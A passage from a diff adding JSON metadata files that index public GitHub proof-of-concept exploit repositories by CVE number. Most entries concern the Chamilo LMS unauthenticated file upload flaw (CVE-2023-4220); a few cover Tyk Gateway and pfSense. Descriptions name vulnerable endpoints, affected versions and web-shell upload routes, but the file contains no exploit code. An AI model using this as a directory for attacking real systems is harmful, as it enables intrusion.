1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42115.json b/2023/CVE-2023-42115.json new file mode 100644 index 0000000000..447ebbee3e --- /dev/null +++ b/2023/CVE-2023-42115.json @@ -0,0 +1,64 @@ +[ + { + "id": 851312368, + "name": "cve-2023-42115", + "full_name": "kirinse\/cve-2023-42115", + "owner": { + "login": "kirinse", + "id": 299712, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/299712?v=4", + "html_url": "https:\/\/github.com\/kirinse", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kirinse\/cve-2023-42115", + "description": "This module exploits a vulnerability in the target service identified as CVE-2023-42115.", + "fork": false, + "created_at": "2024-09-02T21:17:41Z", + "updated_at": "2024-09-02T21:17:41Z", + "pushed_at": "2024-09-02T13:28:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 885081385, + "name": "Pocy", + "full_name": "AdaHop-Cyber-Security\/Pocy", + "owner": { + "login": "AdaHop-Cyber-Security", + "id": 56049928, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56049928?v=4", + "html_url": "https:\/\/github.com\/AdaHop-Cyber-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AdaHop-Cyber-Security\/Pocy", + "description": "A CVE-2023-42115 POC", + "fork": false, + "created_at": "2024-11-07T23:21:45Z", + "updated_at": "2024-11-07T23:25:49Z", + "pushed_at": "2024-11-07T23:25:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-422.json b/2023/CVE-2023-422.json new file mode 100644 index 0000000000..3aca72f69c --- /dev/null +++ b/2023/CVE-2023-422.json @@ -0,0 +1,33 @@ +[ + { + "id": 826504701, + "name": "CVE-2023-422-Chamilo-LMS-RCE", + "full_name": "HusenjanDev\/CVE-2023-422-Chamilo-LMS-RCE", + "owner": { + "login": "HusenjanDev", + "id": 88688451, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88688451?v=4", + "html_url": "https:\/\/github.com\/HusenjanDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HusenjanDev\/CVE-2023-422-Chamilo-LMS-RCE", + "description": "Remote Code Execution for Chamilo LMS", + "fork": false, + "created_at": "2024-07-09T20:47:00Z", + "updated_at": "2024-07-09T20:55:58Z", + "pushed_at": "2024-07-09T20:55:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4220.json b/2023/CVE-2023-4220.json new file mode 100644 index 0000000000..cfb738d19b --- /dev/null +++ b/2023/CVE-2023-4220.json @@ -0,0 +1,721 @@ +[ + { + "id": 825358517, + "name": "chamilo-lms-unauthenticated-big-upload-rce-poc", + "full_name": "m3m0o\/chamilo-lms-unauthenticated-big-upload-rce-poc", + "owner": { + "login": "m3m0o", + "id": 130102748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130102748?v=4", + "html_url": "https:\/\/github.com\/m3m0o", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3m0o\/chamilo-lms-unauthenticated-big-upload-rce-poc", + "description": "This is a script written in Python that allows the exploitation of the Chamilo's LMS software security flaw described in CVE-2023-4220", + "fork": false, + "created_at": "2024-07-07T15:08:30Z", + "updated_at": "2024-10-27T17:09:40Z", + "pushed_at": "2024-07-27T00:19:17Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "chamilo", + "chamilo-lms", + "cve", + "cve-2023-4220", + "exploit", + "rce", + "rce-exploit" + ], + "visibility": "public", + "forks": 3, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825375455, + "name": "Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220", + "full_name": "dollarboysushil\/Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220", + "owner": { + "login": "dollarboysushil", + "id": 48991715, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48991715?v=4", + "html_url": "https:\/\/github.com\/dollarboysushil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dollarboysushil\/Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220", + "description": "Unrestricted file upload in big file upload functionality in `\/main\/inc\/lib\/javascript\/bigupload\/inc\/bigUpload.php` in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell.", + "fork": false, + "created_at": "2024-07-07T15:53:54Z", + "updated_at": "2024-07-31T16:11:57Z", + "pushed_at": "2024-07-07T16:18:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "chamilo-exploit", + "chamilo-lms", + "cve-2023-4220", + "file-upload-vulnerability", + "hackthebox" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825400213, + "name": "CVE-2023-4220", + "full_name": "charlesgargasson\/CVE-2023-4220", + "owner": { + "login": "charlesgargasson", + "id": 26895987, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895987?v=4", + "html_url": "https:\/\/github.com\/charlesgargasson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/charlesgargasson\/CVE-2023-4220", + "description": "RCE Chamilo 1.11.24", + "fork": false, + "created_at": "2024-07-07T16:57:18Z", + "updated_at": "2024-08-16T20:18:49Z", + "pushed_at": "2024-07-11T07:27:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2023", + "beersel", + "bigupload", + "chamilo", + "chamilo-lms", + "cve", + "cve-2023-4220", + "exploit", + "lms", + "poc", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825617104, + "name": "CVE-2023-4220", + "full_name": "insomnia-jacob\/CVE-2023-4220", + "owner": { + "login": "insomnia-jacob", + "id": 174169862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174169862?v=4", + "html_url": "https:\/\/github.com\/insomnia-jacob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/insomnia-jacob\/CVE-2023-4220", + "description": "CVE-2023-4220 POC RCE", + "fork": false, + "created_at": "2024-07-08T07:31:35Z", + "updated_at": "2024-11-30T17:20:41Z", + "pushed_at": "2024-08-07T23:36:20Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825678272, + "name": "Chamilo-CVE-2023-4220-Exploit", + "full_name": "Ziad-Sakr\/Chamilo-CVE-2023-4220-Exploit", + "owner": { + "login": "Ziad-Sakr", + "id": 60154552, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60154552?v=4", + "html_url": "https:\/\/github.com\/Ziad-Sakr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ziad-Sakr\/Chamilo-CVE-2023-4220-Exploit", + "description": "This is an Exploit for Unrestricted file upload in big file upload functionality in Chamilo-LMS for this location \"\/main\/inc\/lib\/javascript\/bigupload\/inc\/bigUpload.php\" in Chamilo LMS <= v1.11.24, and Attackers can obtain remote code execution via uploading of web shell.", + "fork": false, + "created_at": "2024-07-08T09:48:38Z", + "updated_at": "2024-11-08T19:00:18Z", + "pushed_at": "2024-07-08T11:55:53Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "chamilo", + "chamilo-lms", + "cve", + "exploit", + "file-upload-poc", + "lms", + "penetration", + "penetration-testing", + "poc", + "web-shell" + ], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826392009, + "name": "cve-2023-4220-poc", + "full_name": "HO4XXX\/cve-2023-4220-poc", + "owner": { + "login": "HO4XXX", + "id": 128794868, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128794868?v=4", + "html_url": "https:\/\/github.com\/HO4XXX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HO4XXX\/cve-2023-4220-poc", + "description": "PoC for CVE-2023-4220 - Chamilo LMS - Unauthenticated File Upload in BigUpload", + "fork": false, + "created_at": "2024-07-09T16:09:18Z", + "updated_at": "2024-07-10T08:14:06Z", + "pushed_at": "2024-07-09T16:13:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826491015, + "name": "CVE-2023-4220-PoC", + "full_name": "B1TC0R3\/CVE-2023-4220-PoC", + "owner": { + "login": "B1TC0R3", + "id": 77125551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77125551?v=4", + "html_url": "https:\/\/github.com\/B1TC0R3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/B1TC0R3\/CVE-2023-4220-PoC", + "description": "Proof of concept exploit for CVE-2023-4220", + "fork": false, + "created_at": "2024-07-09T20:06:40Z", + "updated_at": "2024-08-19T08:41:49Z", + "pushed_at": "2024-08-19T08:41:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 827338519, + "name": "CVE-2023-4220", + "full_name": "nr4x4\/CVE-2023-4220", + "owner": { + "login": "nr4x4", + "id": 104433163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104433163?v=4", + "html_url": "https:\/\/github.com\/nr4x4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nr4x4\/CVE-2023-4220", + "description": "CVE-2023–4220 Exploit", + "fork": false, + "created_at": "2024-07-11T13:06:17Z", + "updated_at": "2024-07-12T10:21:41Z", + "pushed_at": "2024-07-12T10:21:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828720069, + "name": "CVE-2023-4220-Exploit", + "full_name": "Al3xGD\/CVE-2023-4220-Exploit", + "owner": { + "login": "Al3xGD", + "id": 115897853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115897853?v=4", + "html_url": "https:\/\/github.com\/Al3xGD", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al3xGD\/CVE-2023-4220-Exploit", + "description": "LMS Chamilo 1.11.24 CVE-2023-4220 Exploit", + "fork": false, + "created_at": "2024-07-15T01:38:47Z", + "updated_at": "2024-07-15T01:51:16Z", + "pushed_at": "2024-07-15T01:51:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 837062013, + "name": "chamilo-lms-unauthenticated-rce-poc", + "full_name": "charchit-subedi\/chamilo-lms-unauthenticated-rce-poc", + "owner": { + "login": "charchit-subedi", + "id": 59109697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59109697?v=4", + "html_url": "https:\/\/github.com\/charchit-subedi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/charchit-subedi\/chamilo-lms-unauthenticated-rce-poc", + "description": "This is a script written in Python that allows the exploitation of the Chamilo's LMS software security flaw described in CVE-2023-4220 ", + "fork": false, + "created_at": "2024-08-02T06:14:56Z", + "updated_at": "2024-08-02T06:17:33Z", + "pushed_at": "2024-08-02T06:17:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844242066, + "name": "CVE-2023-4220-Proof-of-concept", + "full_name": "LGenAgul\/CVE-2023-4220-Proof-of-concept", + "owner": { + "login": "LGenAgul", + "id": 110150285, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110150285?v=4", + "html_url": "https:\/\/github.com\/LGenAgul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LGenAgul\/CVE-2023-4220-Proof-of-concept", + "description": "Chamilo LMS Unauthenticated Big Upload File that allows remote code execution", + "fork": false, + "created_at": "2024-08-18T20:00:33Z", + "updated_at": "2024-08-18T20:10:32Z", + "pushed_at": "2024-08-18T20:10:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846844178, + "name": "CVE-2023-4220", + "full_name": "VanishedPeople\/CVE-2023-4220", + "owner": { + "login": "VanishedPeople", + "id": 155242438, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155242438?v=4", + "html_url": "https:\/\/github.com\/VanishedPeople", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VanishedPeople\/CVE-2023-4220", + "description": "CVE-2023-4220 PoC Chamilo RCE", + "fork": false, + "created_at": "2024-08-24T05:32:31Z", + "updated_at": "2024-10-21T13:18:06Z", + "pushed_at": "2024-09-23T18:27:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 847006463, + "name": "CVE-2023-4220_Chamilo_RCE", + "full_name": "thefizzyfish\/CVE-2023-4220_Chamilo_RCE", + "owner": { + "login": "thefizzyfish", + "id": 94797978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94797978?v=4", + "html_url": "https:\/\/github.com\/thefizzyfish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thefizzyfish\/CVE-2023-4220_Chamilo_RCE", + "description": "Python exploit for Chamilo Unrestricted File Upload Vuln - CVE-2023-4220", + "fork": false, + "created_at": "2024-08-24T15:25:28Z", + "updated_at": "2024-11-09T18:59:16Z", + "pushed_at": "2024-10-03T19:29:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848391001, + "name": "CVE-2023-4220", + "full_name": "qrxnz\/CVE-2023-4220", + "owner": { + "login": "qrxnz", + "id": 176516119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176516119?v=4", + "html_url": "https:\/\/github.com\/qrxnz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qrxnz\/CVE-2023-4220", + "description": "CVE-2023-4220 Chamilo Exploit", + "fork": false, + "created_at": "2024-08-27T17:12:48Z", + "updated_at": "2024-08-27T17:17:27Z", + "pushed_at": "2024-08-27T17:17:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851612450, + "name": "Chamilo-CVE-2023-4220-RCE-Exploit", + "full_name": "0x00-null\/Chamilo-CVE-2023-4220-RCE-Exploit", + "owner": { + "login": "0x00-null", + "id": 10076254, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10076254?v=4", + "html_url": "https:\/\/github.com\/0x00-null", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x00-null\/Chamilo-CVE-2023-4220-RCE-Exploit", + "description": "(CVE-2023-4220) Chamilo LMS Unauthenticated Big Upload File Remote Code Execution ", + "fork": false, + "created_at": "2024-09-03T12:16:52Z", + "updated_at": "2024-09-10T12:37:45Z", + "pushed_at": "2024-09-03T13:11:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 877083916, + "name": "CVE-2023-4220-RCE", + "full_name": "bueno-armando\/CVE-2023-4220-RCE", + "owner": { + "login": "bueno-armando", + "id": 124701314, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124701314?v=4", + "html_url": "https:\/\/github.com\/bueno-armando", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bueno-armando\/CVE-2023-4220-RCE", + "description": null, + "fork": false, + "created_at": "2024-10-23T04:01:20Z", + "updated_at": "2024-10-23T05:06:22Z", + "pushed_at": "2024-10-23T05:06:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 879406527, + "name": "Chamilo-LMS-CVE-2023-4220-Exploit", + "full_name": "0xDTC\/Chamilo-LMS-CVE-2023-4220-Exploit", + "owner": { + "login": "0xDTC", + "id": 95960398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95960398?v=4", + "html_url": "https:\/\/github.com\/0xDTC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDTC\/Chamilo-LMS-CVE-2023-4220-Exploit", + "description": "Refurbish Chamilo LMS CVE-2023-4220 exploit written in bash", + "fork": false, + "created_at": "2024-10-27T20:18:13Z", + "updated_at": "2025-01-07T12:54:35Z", + "pushed_at": "2025-01-07T12:54:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 882333805, + "name": "CVE-2023-4220", + "full_name": "H4cking4All\/CVE-2023-4220", + "owner": { + "login": "H4cking4All", + "id": 187107603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/187107603?v=4", + "html_url": "https:\/\/github.com\/H4cking4All", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H4cking4All\/CVE-2023-4220", + "description": "CVE-2023-4220 Chamilo Exploit", + "fork": false, + "created_at": "2024-11-02T14:49:51Z", + "updated_at": "2024-11-02T15:09:11Z", + "pushed_at": "2024-11-02T15:09:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 886317363, + "name": "CVE-2023-4220-HTB-PermX", + "full_name": "oxapavan\/CVE-2023-4220-HTB-PermX", + "owner": { + "login": "oxapavan", + "id": 106510266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106510266?v=4", + "html_url": "https:\/\/github.com\/oxapavan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oxapavan\/CVE-2023-4220-HTB-PermX", + "description": null, + "fork": false, + "created_at": "2024-11-10T18:13:18Z", + "updated_at": "2024-11-11T12:18:47Z", + "pushed_at": "2024-11-10T18:23:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 887758220, + "name": "CVE-2023-4220", + "full_name": "numaan911098\/CVE-2023-4220", + "owner": { + "login": "numaan911098", + "id": 50366430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50366430?v=4", + "html_url": "https:\/\/github.com\/numaan911098", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/numaan911098\/CVE-2023-4220", + "description": "https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-4220", + "fork": false, + "created_at": "2024-11-13T08:30:00Z", + "updated_at": "2024-11-13T08:34:24Z", + "pushed_at": "2024-11-13T08:34:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 898709513, + "name": "CVE-2023-4220", + "full_name": "MikeyPPPPPPPP\/CVE-2023-4220", + "owner": { + "login": "MikeyPPPPPPPP", + "id": 50926811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50926811?v=4", + "html_url": "https:\/\/github.com\/MikeyPPPPPPPP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MikeyPPPPPPPP\/CVE-2023-4220", + "description": "Remote command execution exploit made for redteamers.", + "fork": false, + "created_at": "2024-12-04T22:16:12Z", + "updated_at": "2024-12-05T08:48:28Z", + "pushed_at": "2024-12-05T08:48:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 899001660, + "name": "CVE-2023-4220-exploit", + "full_name": "Pr1or95\/CVE-2023-4220-exploit", + "owner": { + "login": "Pr1or95", + "id": 135025186, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135025186?v=4", + "html_url": "https:\/\/github.com\/Pr1or95", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pr1or95\/CVE-2023-4220-exploit", + "description": "Carga de archivos sin restricciones en la funcionalidad de carga de archivos grandes en `\/main\/inc\/lib\/javascript\/bigupload\/inc\/bigUpload.php` en Chamilo LMS en versiones <= 1.11.24 permite a atacantes no autenticados realizar ataques de Cross Site Scripting almacenados y obtener código remoto ejecución mediante la carga de web shell.", + "fork": false, + "created_at": "2024-12-05T12:45:13Z", + "updated_at": "2024-12-06T11:57:04Z", + "pushed_at": "2024-12-05T13:11:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42222.json b/2023/CVE-2023-42222.json new file mode 100644 index 0000000000..c9a2481295 --- /dev/null +++ b/2023/CVE-2023-42222.json @@ -0,0 +1,33 @@ +[ + { + "id": 697420617, + "name": "CVE-2023-42222", + "full_name": "itssixtyn3in\/CVE-2023-42222", + "owner": { + "login": "itssixtyn3in", + "id": 130003354, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130003354?v=4", + "html_url": "https:\/\/github.com\/itssixtyn3in", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/itssixtyn3in\/CVE-2023-42222", + "description": null, + "fork": false, + "created_at": "2023-09-27T17:36:30Z", + "updated_at": "2024-01-07T10:55:15Z", + "pushed_at": "2023-09-27T17:51:20Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4226.json b/2023/CVE-2023-4226.json new file mode 100644 index 0000000000..5ca852c90b --- /dev/null +++ b/2023/CVE-2023-4226.json @@ -0,0 +1,33 @@ +[ + { + "id": 826590216, + "name": "CVE-2023-4226-POC", + "full_name": "krishnan-tech\/CVE-2023-4226-POC", + "owner": { + "login": "krishnan-tech", + "id": 55576296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55576296?v=4", + "html_url": "https:\/\/github.com\/krishnan-tech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/krishnan-tech\/CVE-2023-4226-POC", + "description": "POC for CVE-2023-4220 - Chamilo LMS Unauthenticated Big Upload File Remote Code Execution", + "fork": false, + "created_at": "2024-07-10T02:26:01Z", + "updated_at": "2024-07-10T02:27:06Z", + "pushed_at": "2024-07-10T02:26:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42283.json b/2023/CVE-2023-42283.json new file mode 100644 index 0000000000..c29d80bdb6 --- /dev/null +++ b/2023/CVE-2023-42283.json @@ -0,0 +1,33 @@ +[ + { + "id": 712086997, + "name": "CVE-2023-42283", + "full_name": "andreysanyuk\/CVE-2023-42283", + "owner": { + "login": "andreysanyuk", + "id": 18166102, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18166102?v=4", + "html_url": "https:\/\/github.com\/andreysanyuk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andreysanyuk\/CVE-2023-42283", + "description": "Proof of concept for CVE-2023-42283 in Tyk Gateway", + "fork": false, + "created_at": "2023-10-30T19:05:41Z", + "updated_at": "2023-11-06T11:47:11Z", + "pushed_at": "2023-10-30T19:29:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42284.json b/2023/CVE-2023-42284.json new file mode 100644 index 0000000000..7d38049bc4 --- /dev/null +++ b/2023/CVE-2023-42284.json @@ -0,0 +1,33 @@ +[ + { + "id": 712094141, + "name": "CVE-2023-42284", + "full_name": "andreysanyuk\/CVE-2023-42284", + "owner": { + "login": "andreysanyuk", + "id": 18166102, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18166102?v=4", + "html_url": "https:\/\/github.com\/andreysanyuk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andreysanyuk\/CVE-2023-42284", + "description": " Proof of concept for CVE-2023-42284 in Tyk Gateway ", + "fork": false, + "created_at": "2023-10-30T19:24:48Z", + "updated_at": "2023-11-06T11:46:29Z", + "pushed_at": "2023-10-30T19:27:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42326.json b/2023/CVE-2023-42326.json new file mode 100644 index 0000000000..0be596e4e3 --- /dev/null +++ b/2023/CVE-2023-42326.json @@ -0,0 +1,33 @@ +[ + { + "id": 877667291, + "name": "CVE-2023-42326", + "full_name": "bl4ckarch\/CVE-2023-42326", + "owner": { + "login": "bl4ckarch", + "id": 62140530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62140530?v=4", + "html_url": "https:\/\/github.com\/bl4ckarch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bl4ckarch\/CVE-2023-42326", + "description": "This is a simple POC to for show the pfsense 2.7 Command injection Vulnerability ( CVE-2023-42326)", + "fork": false, + "created_at": "2024-10-24T03:15:30Z", + "updated_at": "2025-01-07T08:16:20Z", + "pushed_at": "2024-11-05T10:00:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42362.json b/2023/CVE-2023-42362.json new file mode 100644 index 0000000000..c0262de208 --- /dev/null +++ 